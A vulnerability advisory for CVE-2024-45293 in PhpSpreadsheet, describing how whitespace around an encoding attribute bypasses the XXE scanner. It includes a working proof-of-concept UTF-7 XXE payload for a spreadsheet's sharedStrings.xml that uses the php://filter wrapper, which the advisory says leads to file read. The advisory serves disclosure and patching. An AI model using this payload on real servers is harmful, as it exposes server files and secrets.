CVE-2024-45293

描述

### Summary The security scanner responsible for preventing XXE attacks in the XLSX reader can be bypassed by slightly modifying the XML structure, utilizing white-spaces. On servers that allow users to upload their own Excel (XLSX) sheets, Server files and sensitive information can be disclosed by providing a crafted sheet. ### Details The security scan function in `src/PhpSpreadsheet/Reader/Security/XmlScanner.php` contains a flawed XML encoding check to retrieve the input file's XML encoding in the `toUtf8` function. The function searches for the XML encoding through a defined regex which looks for `encoding="*"` and/or `encoding='*'`, if not found, it defaults to the UTF-8 encoding which bypasses the conversion logic. ``` $patterns = [ '/encoding="([^"]*]?)"/', "/encoding='([^']*?)'/", ]; ``` This logic can be used to pass a UTF-7 encoded XXE payload, by utilizing a whitespace before or after the `=` in the attribute definition. ### PoC Needed: - An Excel sheet (XLSX) with at least one cell containing a value. Unzip the excel sheet, and modify the `xl/SharedStrings.xml` file with the following value (note the space after `encoding=`): ``` <?xml version="1.0" encoding= 'UTF-7' standalone="yes"?> +ADw-!DOCTYPE abc [ ... ]> ``` #### Step-by-step 1. First off, the following string is encoded in base64: ``` <!ENTITY internal 'abc' >" ``` Resulting in: ``` PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K ``` 2. The string is used with a parameter entity and the PHP filter wrapper to ultimately define custom entities and call them within the XML. ``` <?xml version="1.0" encoding= 'UTF-7' standalone="yes"?> +ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "php://filter//resource=data://text/plain;base64,PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K" > %xxe;]> <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&internal;</t></si></sst> ``` When this file is parsed by the library, the value `abc` should be in the original filled cell. With the help of the PHP filter wrapper, this can be escalated to information disclosure/file read. ### Impact Sensitive information disclosure through the XXE on sites that allow users to upload their own excel spreadsheets, and parse them using PHPSpreadsheet's Excel parser.

受影響套件(2)

• Packagist/phpoffice/phpexcelfrom 0, <= 1.8.2
• Packagist/phpoffice/phpspreadsheet>= 2.2.0, < 2.3.0

CVSS 分數

參考連結(6)

• ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2024-45293
• PATCHhttps://github.com/PHPOffice/PhpSpreadsheet
• WEBhttps://github.com/PHPOffice/PhpSpreadsheet/commit/3bcd51826b7f089d1641e756c83030c30c3bdb0c
• WEBhttps://github.com/PHPOffice/PhpSpreadsheet/commit/7d6cb09f6e8204f65e6dd5a0490f7f45f44bb331
• WEBhttps://github.com/PHPOffice/PhpSpreadsheet/commit/949ff63e1f6413e6485f73af012d506aa81384bf
• WEBhttps://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-6hwr-6v2f-3m88